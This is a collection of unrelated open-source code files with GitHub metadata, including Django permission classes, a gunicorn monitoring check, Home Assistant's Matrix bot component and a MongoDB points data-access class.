"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "home/pi/GrovePi/Software/Python/others/temboo/Library/Factual/FilterPlacesByTopLevelCategory.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "82308"
},
{
"name": "C",
"bytes": "3197439"
},
{
"name": "C#",
"bytes": "33056"
},
{
"name": "C++",
"bytes": "1020255"
},
{
"name": "CSS",
"bytes": "208338"
},
{
"name": "CoffeeScript",
"bytes": "87200"
},
{
"name": "Eagle",
"bytes": "1632170"
},
{
"name": "Go",
"bytes": "3646"
},
{
"name": "Groff",
"bytes": "286691"
},
{
"name": "HTML",
"bytes": "41527"
},
{
"name": "JavaScript",
"bytes": "403603"
},
{
"name": "Makefile",
"bytes": "33808"
},
{
"name": "Objective-C",
"bytes": "69457"
},
{
"name": "Perl",
"bytes": "96047"
},
{
"name": "Processing",
"bytes": "1304"
},
{
"name": "Python",
"bytes": "13358098"
},
{
"name": "Shell",
"bytes": "68795"
},
{
"name": "TeX",
"bytes": "4317"
}
],
"symlink_target": ""
}
|
from cx_Freeze import main
main.main()
|
{
"content_hash": "8fc80849f33d93d1e7748a36aafda8a2",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 26,
"avg_line_length": 13.333333333333334,
"alnum_prop": 0.75,
"repo_name": "Zamiell/RebirthItemTracker",
"id": "e6b94ffdfca56bc8ef4186f8461f0c933b7df04e",
"size": "133",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "src_updater/cxfreeze.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "164142"
}
],
"symlink_target": ""
}
|
import logging
from rest_framework import permissions
from bluebottle.members.models import MemberPlatformSettings
logger = logging.getLogger(__name__)
class PermissionsException(Exception):
pass
class IsOwner(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
"""
Return `True` if user is owner of the object granted, `False` otherwise.
"""
return obj.owner == request.user
class IsUser(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
"""
Return `True` if user is owner of the object granted, `False` otherwise.
"""
return obj.user == request.user
class BasePermission(permissions.BasePermission):
""" BasePermission extends the standard BasePermission from DRF to include
the ability to get the permissions without the request.
Currently the `view` is being passed which then gives access to the request.
TODO: it should be possible to get the permissions based on a `action`, `user`,
and an optional `obj` which might be a parent type rather than the actual obj
particularly if the permission being checked is the ability to create an obj
"""
def get_view_model(self, view):
model_cls = None
try:
model_cls = view.model
except AttributeError:
message = (
'The related view `{}` does not have a model property.'.format(view.__class__.__name__),
'Is this a legacy view using ResourcePermissions?'
)
raise PermissionsException(' '.join(message))
return model_cls
def has_object_permission(self, request, view, obj):
""" This action is called from the views which include this permission.
The call happens after the referenced obj has been fetched and will not be
called if no object was found.
Return `True` if permission is granted, `False` otherwise.
"""
return self.has_object_action_permission(
request.method, request.user, obj
)
def has_permission(self, request, view):
""" This action is called from the views which include this permission.
The call happens during view initialisation so it will be called with views returning
a data set as well as a single object.
Return `True` if permission is granted, `False` otherwise.
"""
try:
model_cls = self.get_view_model(view)
return self.has_action_permission(
request.method, request.user, model_cls
)
except TypeError as err:
message = (
'{} not implemented correctly.'.format(self.__class__.__name__),
'Error: {}'.format(err.message)
)
raise PermissionsException(' '.join(message))
except PermissionsException:
return super(BasePermission, self).has_permission(request, view)
def has_parent_permission(self, method, user, parent, model=None):
"""
Check if user has permission on the parent obj
Used by RelatedResource permission classes and for return related permissions
"""
return True
def has_object_action_permission(self, action, user, obj):
""" Check if user has permission to access action on obj for the view.
Used by both the DRF permission system and for returning permissions to the user.
"""
message = 'has_object_action_permission() must be implemented on {}'.format(self)
raise NotImplementedError(message)
def has_action_permission(self, action, user, model_cls):
""" Check if user has permission to access action for the view.
Used by both the DRF permission system and for returning permissions to the user.
"""
message = 'has_action_permission() must be implemented on {}'.format(self)
raise NotImplementedError(message)
class IsOwnerOrReadOnly(BasePermission):
def has_action_permission(self, action, user, model_cls):
"""
Return `True` if user is owner of the object granted, `False` otherwise.
"""
return True
def has_object_permission(self, request, view, obj):
"""
Return `True` if user is owner of the object granted, `False` otherwise.
"""
return (request.method in permissions.SAFE_METHODS) or obj.owner == request.user
def has_object_action_permission(self, action, user, obj):
return (action in permissions.SAFE_METHODS) or obj.owner == user
class IsAuthenticated(BasePermission):
def has_action_permission(self, action, user, obj):
"""
Return `True` if user is owner of the object granted, `False` otherwise.
"""
return user.is_authenticated
def has_object_permission(self, request, view, obj):
"""
Return `True` if user is owner of the object granted, `False` otherwise.
"""
return request.user.is_authenticated
def has_object_action_permission(self, action, user, obj):
return user.is_authenticated
class ResourcePermission(BasePermission, permissions.DjangoModelPermissions):
perms_map = {
'GET': ['%(app_label)s.api_read_%(model_name)s'],
'OPTIONS': [],
'HEAD': ['%(app_label)s.api_read_%(model_name)s'],
'POST': ['%(app_label)s.api_add_%(model_name)s'],
'PUT': ['%(app_label)s.api_change_%(model_name)s'],
'PATCH': ['%(app_label)s.api_change_%(model_name)s'],
'DELETE': ['%(app_label)s.api_delete_%(model_name)s'],
}
def has_object_action_permission(self, action, user, obj):
return True
def has_action_permission(self, action, user, model_cls):
if model_cls:
perms = self.get_required_permissions(action, model_cls)
return user.has_perms(perms)
else:
return True
def __repr__(self):
return 'ResourcePermission'
class ResourceOwnerPermission(ResourcePermission):
""" Allows access only to obj owner. """
perms_map = {
'GET': ['%(app_label)s.api_read_own_%(model_name)s'],
'OPTIONS': [],
'HEAD': ['%(app_label)s.api_read_own_%(model_name)s'],
'POST': ['%(app_label)s.api_add_own_%(model_name)s'],
'PUT': ['%(app_label)s.api_change_own_%(model_name)s'],
'PATCH': ['%(app_label)s.api_change_own_%(model_name)s'],
'DELETE': ['%(app_label)s.api_delete_own_%(model_name)s'],
}
def has_object_action_permission(self, action, user, obj):
return user == obj.owner
class RelatedResourceOwnerPermission(ResourceOwnerPermission):
""" Allows access only to obj owner of related resource.
This class assumes the child resource has a `parent` property which will return the parent object.
"""
def has_parent_permission(self, action, user, parent, model=None):
return user == parent.owner
def has_object_action_permission(self, action, user, obj):
return self.has_parent_permission(action, user, obj.parent)
class TenantConditionalOpenClose(BasePermission):
""" Allows access only to authenticated users. """
def has_object_action_permission(self, action, user, obj):
try:
settings = MemberPlatformSettings.objects.get()
if settings.closed:
return user and user.is_authenticated
except AttributeError:
pass
return True
def has_action_permission(self, action, user, model_cls):
try:
settings = MemberPlatformSettings.objects.get()
if settings.closed:
return user and user.is_authenticated
except AttributeError:
pass
return True
class AuthenticatedOrReadOnlyPermission(IsAuthenticated):
""" Allow access if the user is authenticated or the request uses a safe action. """
def has_action_permission(self, action, user, model_cls):
if action in permissions.SAFE_METHODS:
return True
return user and user.is_authenticated
def OneOf(*permission_classes):
class OneOf(BasePermission):
permissions = permission_classes
def has_parent_permission(self, action, user, parent, model):
return any(
(
perm().has_parent_permission(action, user, parent, model) and
perm().has_action_permission(action, user, model)
) for perm in self.permissions
)
def has_object_action_permission(self, action, user, obj):
return any(
(
perm().has_object_action_permission(action, user, obj) and
perm().has_action_permission(action, user, obj._meta.model)
) for perm in self.permissions
)
def has_action_permission(self, *args, **kwargs):
return any(
perm().has_action_permission(*args, **kwargs) for
perm in self.permissions
)
return OneOf
|
{
"content_hash": "57719bb19912de9b92689ba935e63999",
"timestamp": "",
"source": "github",
"line_count": 263,
"max_line_length": 104,
"avg_line_length": 34.80988593155894,
"alnum_prop": 0.6242490442381212,
"repo_name": "onepercentclub/bluebottle",
"id": "8299b1b2cca0a63028d86328ef68ba88fea5c8bf",
"size": "9155",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bluebottle/utils/permissions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "41694"
},
{
"name": "HTML",
"bytes": "246695"
},
{
"name": "Handlebars",
"bytes": "63"
},
{
"name": "JavaScript",
"bytes": "139123"
},
{
"name": "PHP",
"bytes": "35"
},
{
"name": "PLpgSQL",
"bytes": "1369882"
},
{
"name": "PostScript",
"bytes": "2927"
},
{
"name": "Python",
"bytes": "4983116"
},
{
"name": "Rich Text Format",
"bytes": "39109"
},
{
"name": "SCSS",
"bytes": "99555"
},
{
"name": "Shell",
"bytes": "3068"
},
{
"name": "Smarty",
"bytes": "3814"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
urlpatterns = [
url(r'^grappelli/', include('grappelli.urls')),
url(r'^admin/', include(admin.site.urls)),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
{
"content_hash": "ab0b389117ad08c05f51eaf011d78a7b",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 65,
"avg_line_length": 37,
"alnum_prop": 0.7507507507507507,
"repo_name": "CodeforLeipzig/fog",
"id": "f86822c7cfb0ff2257c8c57c0c193b3330787536",
"size": "357",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fog/config/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "204"
},
{
"name": "HTML",
"bytes": "12021"
},
{
"name": "JavaScript",
"bytes": "1"
},
{
"name": "Makefile",
"bytes": "5210"
},
{
"name": "Python",
"bytes": "17765"
},
{
"name": "Shell",
"bytes": "131"
}
],
"symlink_target": ""
}
|
"""
Collects metrics from the gunicorn web server.
http://gunicorn.org/
"""
# stdlib
import time
# 3rd party
import psutil
# project
from checks import AgentCheck
class GUnicornCheck(AgentCheck):
# Config
PROC_NAME = 'proc_name'
# Number of seconds to sleep between cpu time checks.
CPU_SLEEP_SECS = 0.1
# Worker state tags.
IDLE_TAGS = ["state:idle"]
WORKING_TAGS = ["state:working"]
SVC_NAME = "gunicorn.is_running"
def get_library_versions(self):
return {"psutil": psutil.__version__}
def check(self, instance):
""" Collect metrics for the given gunicorn instance. """
self.log.debug("Running instance: %s", instance)
# Validate the config.
if not instance or self.PROC_NAME not in instance:
raise GUnicornCheckError("instance must specify: %s" % self.PROC_NAME)
# Load the gunicorn master procedure.
proc_name = instance.get(self.PROC_NAME)
master_proc = self._get_master_proc_by_name(proc_name)
# Fetch the worker procs and count their states.
worker_procs = master_proc.children()
working, idle = self._count_workers(worker_procs)
# if no workers are running, alert CRITICAL, otherwise OK
msg = "%s working and %s idle workers for %s" % (working, idle, proc_name)
status = AgentCheck.CRITICAL if working == 0 and idle == 0 else AgentCheck.OK
self.service_check(self.SVC_NAME, status, tags=['app:' + proc_name], message=msg)
# Submit the data.
self.log.debug("instance %s procs - working:%s idle:%s" % (proc_name, working, idle))
self.gauge("gunicorn.workers", working, self.WORKING_TAGS)
self.gauge("gunicorn.workers", idle, self.IDLE_TAGS)
def _count_workers(self, worker_procs):
working = 0
idle = 0
if not worker_procs:
return working, idle
# Count how much sleep time is used by the workers.
cpu_time_by_pid = {}
for proc in worker_procs:
# cpu time is the sum of user + system time.
try:
cpu_time_by_pid[proc.pid] = sum(proc.cpu_times())
except psutil.NoSuchProcess:
self.warning('Process %s disappeared while scanning' % proc.name)
continue
# Let them do a little bit more work.
time.sleep(self.CPU_SLEEP_SECS)
# Processes which have used more CPU are considered active (this is a very
# naive check, but gunicorn exposes no stats API)
for proc in worker_procs:
if proc.pid not in cpu_time_by_pid:
# The process is not running anymore, we didn't collect initial cpu times
continue
try:
cpu_time = sum(proc.cpu_times())
except Exception:
# couldn't collect cpu time. assume it's dead.
self.log.debug("Couldn't collect cpu time for %s" % proc)
continue
if cpu_time == cpu_time_by_pid[proc.pid]:
idle += 1
else:
working += 1
return working, idle
def _get_master_proc_by_name(self, name):
""" Return a psutil process for the master gunicorn process with the given name. """
master_name = GUnicornCheck._get_master_proc_name(name)
master_procs = [p for p in psutil.process_iter() if p.cmdline() and p.cmdline()[0] == master_name]
if len(master_procs) == 0:
# process not found, it's dead.
self.service_check(self.SVC_NAME, AgentCheck.CRITICAL, tags=['app:' + name],
message="No gunicorn process with name %s found" % name)
raise GUnicornCheckError("Found no master process with name: %s" % master_name)
elif len(master_procs) > 1:
raise GUnicornCheckError("Found more than one master process with name: %s" % master_name)
else:
return master_procs[0]
@staticmethod
def _get_master_proc_name(name):
""" Return the name of the master gunicorn process for the given proc name. """
# Here's an example of a process list for a gunicorn box with name web1
# root 22976 0.1 0.1 60364 13424 ? Ss 19:30 0:00 gunicorn: master [web1]
# web 22984 20.7 2.3 521924 176136 ? Sl 19:30 1:58 gunicorn: worker [web1]
# web 22985 26.4 6.1 795288 449596 ? Sl 19:30 2:32 gunicorn: worker [web1]
return "gunicorn: master [%s]" % name
class GUnicornCheckError(Exception):
pass
|
{
"content_hash": "3cb66880a3c63702f6a511db3d77ad47",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 106,
"avg_line_length": 37.61788617886179,
"alnum_prop": 0.5975794251134644,
"repo_name": "mderomph-coolblue/dd-agent",
"id": "05766dbd0e62fa319557f0d002b1d0c0530dea68",
"size": "4627",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "checks.d/gunicorn.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2717"
},
{
"name": "Go",
"bytes": "2389"
},
{
"name": "HTML",
"bytes": "8758"
},
{
"name": "Nginx",
"bytes": "3908"
},
{
"name": "PowerShell",
"bytes": "2665"
},
{
"name": "Python",
"bytes": "2051024"
},
{
"name": "Ruby",
"bytes": "98141"
},
{
"name": "Shell",
"bytes": "54709"
},
{
"name": "XSLT",
"bytes": "2222"
}
],
"symlink_target": ""
}
|
import mock
import pytest
from mock import Mock
from nose.tools import eq_
from olympia import amo
from olympia.amo import models as amo_models
from olympia.amo.tests import TestCase
from olympia.amo import models as context
from olympia.addons.models import Addon
from olympia.users.models import UserProfile
pytestmark = pytest.mark.django_db
class ManualOrderTest(TestCase):
fixtures = ('base/addon_3615', 'base/addon_5299_gcal', 'base/addon_40')
def test_ordering(self):
"""Given a specific set of primary keys, assure that we return addons
in that order."""
semi_arbitrary_order = [40, 5299, 3615]
addons = amo_models.manual_order(
Addon.objects.all(), semi_arbitrary_order)
eq_(semi_arbitrary_order, [addon.id for addon in addons])
def test_skip_cache():
eq_(getattr(context._locals, 'skip_cache', False), False)
with context.skip_cache():
eq_(context._locals.skip_cache, True)
with context.skip_cache():
eq_(context._locals.skip_cache, True)
eq_(context._locals.skip_cache, True)
eq_(context._locals.skip_cache, False)
def test_use_master():
local = context.multidb.pinning._locals
eq_(getattr(local, 'pinned', False), False)
with context.use_master():
eq_(local.pinned, True)
with context.use_master():
eq_(local.pinned, True)
eq_(local.pinned, True)
eq_(local.pinned, False)
class TestModelBase(TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestModelBase, self).setUp()
self.saved_cb = amo_models._on_change_callbacks.copy()
amo_models._on_change_callbacks.clear()
self.cb = Mock()
self.cb.__name__ = 'testing_mock_callback'
Addon.on_change(self.cb)
def tearDown(self):
amo_models._on_change_callbacks = self.saved_cb
super(TestModelBase, self).tearDown()
def test_multiple_ignored(self):
cb = Mock()
cb.__name__ = 'something'
old = len(amo_models._on_change_callbacks[Addon])
Addon.on_change(cb)
eq_(len(amo_models._on_change_callbacks[Addon]), old + 1)
Addon.on_change(cb)
eq_(len(amo_models._on_change_callbacks[Addon]), old + 1)
def test_change_called_on_new_instance_save(self):
for create_addon in (Addon, Addon.objects.create):
addon = create_addon(site_specific=False, type=amo.ADDON_EXTENSION)
addon.site_specific = True
addon.save()
assert self.cb.called
kw = self.cb.call_args[1]
eq_(kw['old_attr']['site_specific'], False)
eq_(kw['new_attr']['site_specific'], True)
eq_(kw['instance'].id, addon.id)
eq_(kw['sender'], Addon)
def test_change_called_on_update(self):
addon = Addon.objects.get(pk=3615)
addon.update(site_specific=False)
assert self.cb.called
kw = self.cb.call_args[1]
eq_(kw['old_attr']['site_specific'], True)
eq_(kw['new_attr']['site_specific'], False)
eq_(kw['instance'].id, addon.id)
eq_(kw['sender'], Addon)
def test_change_called_on_save(self):
addon = Addon.objects.get(pk=3615)
addon.site_specific = False
addon.save()
assert self.cb.called
kw = self.cb.call_args[1]
eq_(kw['old_attr']['site_specific'], True)
eq_(kw['new_attr']['site_specific'], False)
eq_(kw['instance'].id, addon.id)
eq_(kw['sender'], Addon)
def test_change_is_not_recursive(self):
class fn:
called = False
def callback(old_attr=None, new_attr=None, instance=None,
sender=None, **kw):
fn.called = True
# Both save and update should be protected:
instance.update(site_specific=False)
instance.save()
Addon.on_change(callback)
addon = Addon.objects.get(pk=3615)
addon.save()
assert fn.called
# No exception = pass
def test_safer_get_or_create(self):
data = {'guid': '123', 'type': amo.ADDON_EXTENSION}
a, c = Addon.objects.safer_get_or_create(**data)
assert c
b, c = Addon.objects.safer_get_or_create(**data)
assert not c
eq_(a, b)
def test_reload(self):
# Make it an extension.
addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
addon.save()
# Make it a persona.
Addon.objects.get(id=addon.id).update(type=amo.ADDON_PERSONA)
# Still an extension.
eq_(addon.type, amo.ADDON_EXTENSION)
# Reload. And it's magically now a persona.
eq_(addon.reload().type, amo.ADDON_PERSONA)
eq_(addon.type, amo.ADDON_PERSONA)
def test_get_unfiltered_manager(self):
Addon.get_unfiltered_manager() == Addon.unfiltered
UserProfile.get_unfiltered_manager() == UserProfile.objects
def test_measure_save_time(self):
addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
with mock.patch('olympia.amo.models.statsd.timer') as timer:
addon.save()
timer.assert_any_call('cache_machine.manager.post_save')
def test_measure_delete_time(self):
addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
with mock.patch('olympia.amo.models.statsd.timer') as timer:
addon.delete()
timer.assert_any_call('cache_machine.manager.post_delete')
def test_cache_key():
# Test that we are not taking the db into account when building our
# cache keys for django-cache-machine. See bug 928881.
eq_(Addon._cache_key(1, 'default'), Addon._cache_key(1, 'slave'))
|
{
"content_hash": "44a2f69dcda28bf899b8db8dbd8697ea",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 79,
"avg_line_length": 33.71176470588235,
"alnum_prop": 0.6126330483336242,
"repo_name": "jpetto/olympia",
"id": "15127054eeed20731acc38c96940587aa97535a5",
"size": "5731",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/olympia/amo/tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "249"
},
{
"name": "CSS",
"bytes": "665496"
},
{
"name": "HTML",
"bytes": "1606994"
},
{
"name": "JavaScript",
"bytes": "1315514"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PLSQL",
"bytes": "74"
},
{
"name": "Python",
"bytes": "4026490"
},
{
"name": "Shell",
"bytes": "9145"
},
{
"name": "Smarty",
"bytes": "1930"
}
],
"symlink_target": ""
}
|
"""The matrix bot component."""
import logging
import os
from functools import partial
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.notify import ATTR_TARGET, ATTR_MESSAGE
from homeassistant.const import (
CONF_USERNAME,
CONF_PASSWORD,
CONF_VERIFY_SSL,
CONF_NAME,
EVENT_HOMEASSISTANT_STOP,
EVENT_HOMEASSISTANT_START,
)
from homeassistant.util.json import load_json, save_json
from homeassistant.exceptions import HomeAssistantError
_LOGGER = logging.getLogger(__name__)
SESSION_FILE = ".matrix.conf"
CONF_HOMESERVER = "homeserver"
CONF_ROOMS = "rooms"
CONF_COMMANDS = "commands"
CONF_WORD = "word"
CONF_EXPRESSION = "expression"
EVENT_MATRIX_COMMAND = "matrix_command"
DOMAIN = "matrix"
COMMAND_SCHEMA = vol.All(
# Basic Schema
vol.Schema(
{
vol.Exclusive(CONF_WORD, "trigger"): cv.string,
vol.Exclusive(CONF_EXPRESSION, "trigger"): cv.is_regex,
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_ROOMS, default=[]): vol.All(cv.ensure_list, [cv.string]),
}
),
# Make sure it's either a word or an expression command
cv.has_at_least_one_key(CONF_WORD, CONF_EXPRESSION),
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_HOMESERVER): cv.url,
vol.Optional(CONF_VERIFY_SSL, default=True): cv.boolean,
vol.Required(CONF_USERNAME): cv.matches_regex("@[^:]*:.*"),
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_ROOMS, default=[]): vol.All(
cv.ensure_list, [cv.string]
),
vol.Optional(CONF_COMMANDS, default=[]): [COMMAND_SCHEMA],
}
)
},
extra=vol.ALLOW_EXTRA,
)
SERVICE_SEND_MESSAGE = "send_message"
SERVICE_SCHEMA_SEND_MESSAGE = vol.Schema(
{
vol.Required(ATTR_MESSAGE): cv.string,
vol.Required(ATTR_TARGET): vol.All(cv.ensure_list, [cv.string]),
}
)
def setup(hass, config):
"""Set up the Matrix bot component."""
from matrix_client.client import MatrixRequestError
config = config[DOMAIN]
try:
bot = MatrixBot(
hass,
os.path.join(hass.config.path(), SESSION_FILE),
config[CONF_HOMESERVER],
config[CONF_VERIFY_SSL],
config[CONF_USERNAME],
config[CONF_PASSWORD],
config[CONF_ROOMS],
config[CONF_COMMANDS],
)
hass.data[DOMAIN] = bot
except MatrixRequestError as exception:
_LOGGER.error("Matrix failed to log in: %s", str(exception))
return False
hass.services.register(
DOMAIN,
SERVICE_SEND_MESSAGE,
bot.handle_send_message,
schema=SERVICE_SCHEMA_SEND_MESSAGE,
)
return True
class MatrixBot:
"""The Matrix Bot."""
def __init__(
self,
hass,
config_file,
homeserver,
verify_ssl,
username,
password,
listening_rooms,
commands,
):
"""Set up the client."""
self.hass = hass
self._session_filepath = config_file
self._auth_tokens = self._get_auth_tokens()
self._homeserver = homeserver
self._verify_tls = verify_ssl
self._mx_id = username
self._password = password
self._listening_rooms = listening_rooms
# We have to fetch the aliases for every room to make sure we don't
# join it twice by accident. However, fetching aliases is costly,
# so we only do it once per room.
self._aliases_fetched_for = set()
# word commands are stored dict-of-dict: First dict indexes by room ID
# / alias, second dict indexes by the word
self._word_commands = {}
# regular expression commands are stored as a list of commands per
# room, i.e., a dict-of-list
self._expression_commands = {}
for command in commands:
if not command.get(CONF_ROOMS):
command[CONF_ROOMS] = listening_rooms
if command.get(CONF_WORD):
for room_id in command[CONF_ROOMS]:
if room_id not in self._word_commands:
self._word_commands[room_id] = {}
self._word_commands[room_id][command[CONF_WORD]] = command
else:
for room_id in command[CONF_ROOMS]:
if room_id not in self._expression_commands:
self._expression_commands[room_id] = []
self._expression_commands[room_id].append(command)
# Log in. This raises a MatrixRequestError if login is unsuccessful
self._client = self._login()
def handle_matrix_exception(exception):
"""Handle exceptions raised inside the Matrix SDK."""
_LOGGER.error("Matrix exception:\n %s", str(exception))
self._client.start_listener_thread(exception_handler=handle_matrix_exception)
def stop_client(_):
"""Run once when Home Assistant stops."""
self._client.stop_listener_thread()
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_client)
# Joining rooms potentially does a lot of I/O, so we defer it
def handle_startup(_):
"""Run once when Home Assistant finished startup."""
self._join_rooms()
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, handle_startup)
def _handle_room_message(self, room_id, room, event):
"""Handle a message sent to a room."""
if event["content"]["msgtype"] != "m.text":
return
if event["sender"] == self._mx_id:
return
_LOGGER.debug("Handling message: %s", event["content"]["body"])
if event["content"]["body"][0] == "!":
# Could trigger a single-word command.
pieces = event["content"]["body"].split(" ")
cmd = pieces[0][1:]
command = self._word_commands.get(room_id, {}).get(cmd)
if command:
event_data = {
"command": command[CONF_NAME],
"sender": event["sender"],
"room": room_id,
"args": pieces[1:],
}
self.hass.bus.fire(EVENT_MATRIX_COMMAND, event_data)
# After single-word commands, check all regex commands in the room
for command in self._expression_commands.get(room_id, []):
match = command[CONF_EXPRESSION].match(event["content"]["body"])
if not match:
continue
event_data = {
"command": command[CONF_NAME],
"sender": event["sender"],
"room": room_id,
"args": match.groupdict(),
}
self.hass.bus.fire(EVENT_MATRIX_COMMAND, event_data)
def _join_or_get_room(self, room_id_or_alias):
"""Join a room or get it, if we are already in the room.
We can't just always call join_room(), since that seems to crash
the client if we're already in the room.
"""
rooms = self._client.get_rooms()
if room_id_or_alias in rooms:
_LOGGER.debug("Already in room %s", room_id_or_alias)
return rooms[room_id_or_alias]
for room in rooms.values():
if room.room_id not in self._aliases_fetched_for:
room.update_aliases()
self._aliases_fetched_for.add(room.room_id)
if room_id_or_alias in room.aliases:
_LOGGER.debug(
"Already in room %s (known as %s)", room.room_id, room_id_or_alias
)
return room
room = self._client.join_room(room_id_or_alias)
_LOGGER.info("Joined room %s (known as %s)", room.room_id, room_id_or_alias)
return room
def _join_rooms(self):
"""Join the rooms that we listen for commands in."""
from matrix_client.client import MatrixRequestError
for room_id in self._listening_rooms:
try:
room = self._join_or_get_room(room_id)
room.add_listener(
partial(self._handle_room_message, room_id), "m.room.message"
)
except MatrixRequestError as ex:
_LOGGER.error("Could not join room %s: %s", room_id, ex)
def _get_auth_tokens(self):
"""
Read sorted authentication tokens from disk.
Returns the auth_tokens dictionary.
"""
try:
auth_tokens = load_json(self._session_filepath)
return auth_tokens
except HomeAssistantError as ex:
_LOGGER.warning(
"Loading authentication tokens from file '%s' failed: %s",
self._session_filepath,
str(ex),
)
return {}
def _store_auth_token(self, token):
"""Store authentication token to session and persistent storage."""
self._auth_tokens[self._mx_id] = token
save_json(self._session_filepath, self._auth_tokens)
def _login(self):
"""Login to the matrix homeserver and return the client instance."""
from matrix_client.client import MatrixRequestError
# Attempt to generate a valid client using either of the two possible
# login methods:
client = None
# If we have an authentication token
if self._mx_id in self._auth_tokens:
try:
client = self._login_by_token()
_LOGGER.debug("Logged in using stored token.")
except MatrixRequestError as ex:
_LOGGER.warning(
"Login by token failed, falling back to password. "
"login_by_token raised: (%d) %s",
ex.code,
ex.content,
)
# If we still don't have a client try password.
if not client:
try:
client = self._login_by_password()
_LOGGER.debug("Logged in using password.")
except MatrixRequestError as ex:
_LOGGER.error(
"Login failed, both token and username/password invalid "
"login_by_password raised: (%d) %s",
ex.code,
ex.content,
)
# re-raise the error so _setup can catch it.
raise
return client
def _login_by_token(self):
"""Login using authentication token and return the client."""
from matrix_client.client import MatrixClient
return MatrixClient(
base_url=self._homeserver,
token=self._auth_tokens[self._mx_id],
user_id=self._mx_id,
valid_cert_check=self._verify_tls,
)
def _login_by_password(self):
"""Login using password authentication and return the client."""
from matrix_client.client import MatrixClient
_client = MatrixClient(
base_url=self._homeserver, valid_cert_check=self._verify_tls
)
_client.login_with_password(self._mx_id, self._password)
self._store_auth_token(_client.token)
return _client
def _send_message(self, message, target_rooms):
"""Send the message to the matrix server."""
from matrix_client.client import MatrixRequestError
for target_room in target_rooms:
try:
room = self._join_or_get_room(target_room)
_LOGGER.debug(room.send_text(message))
except MatrixRequestError as ex:
_LOGGER.error(
"Unable to deliver message to room '%s': (%d): %s",
target_room,
ex.code,
ex.content,
)
def handle_send_message(self, service):
"""Handle the send_message service."""
self._send_message(service.data[ATTR_MESSAGE], service.data[ATTR_TARGET])
|
{
"content_hash": "bc09689ea6bd01acf54bfeca35901d11",
"timestamp": "",
"source": "github",
"line_count": 372,
"max_line_length": 87,
"avg_line_length": 32.89784946236559,
"alnum_prop": 0.5603856839352835,
"repo_name": "joopert/home-assistant",
"id": "4a9435808bbf6637e9a1bba2b3f9a1673b88a3e2",
"size": "12238",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "homeassistant/components/matrix/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "18670593"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
}
|
import sys
import re
import datetime
import time
import pymongo
from bson.objectid import ObjectId
# The Blog Post Data Access Object handles interactions with the Posts collection
class PointsDAO:
# constructor for the class
def __init__(self, database):
self.db = database
self.points = database.points
# inserts the blog entry and returns a permalink for the entry
def insert_entry(self, user_id, points, shares):
#print "inserting blog entry", title, post
# fix up the permalink to not include whitespace
entry = {"user_id":user_id,
"points": points,
"shares": shares,
"time": datetime.datetime.utcnow()
}
# now insert the post
try:
# XXX HW 3.2 Work Here to insert the post
print "Inserting the put", entry
self.points.insert(entry)
except:
print "Error inserting post"
print "Unexpected error:", sys.exc_info()[0]
return
# returns an array of num_posts posts, reverse ordered
def get_points(self, user_id):
new = self.points.find({"user_id":user_id}).sort([("time", pymongo.DESCENDING)]).limit(1)
return new.next()
def getAllpoints(self, user_id):
new = self.points.find({"user_id":user_id}).sort([("time", pymongo.ASCENDING)])
return list(new)
def accept_put(self, poster_id, accepter_id, point_count, share_count):
old_accepter = self.get_points(accepter_id)
old_poster = self.get_points(poster_id)
now = datetime.datetime.utcnow()
print now
new_accepter= {"user_id": accepter_id,
"points": str(int(float(old_accepter["points"])-float(point_count)*float(share_count))),
"shares": str(int(float(old_accepter["shares"]) + float(share_count))),
"time": now
}
new_poster= {"user_id": poster_id,
"points": str(int(float(old_poster["points"])+float(point_count)*float(share_count))),
"shares": str(int(float(old_poster["shares"]) - float(share_count))),
"time": now
}
print new_accepter, new_poster
self.points.insert(new_accepter)
self.points.insert(new_poster)
def accept_call(self, poster_id, accepter_id, point_count,share_count):
old_accepter=self.get_points(accepter_id)
old_poster=self.get_points(poster_id)
now=datetime.datetime.utcnow()
new_accepter= {"user_id": accepter_id,
"points": str(int(float(old_accepter["points"])+float(point_count))),
"shares": str(int(float(old_accepter["shares"]) - float(share_count))),
"time": now
}
new_poster= {"user_id": poster_id,
"points": str(int(float(old_poster["points"])-float(point_count))),
"shares": str(int(float(old_poster["shares"]) + float(share_count))),
"time": now
}
self.points.insert(new_accepter)
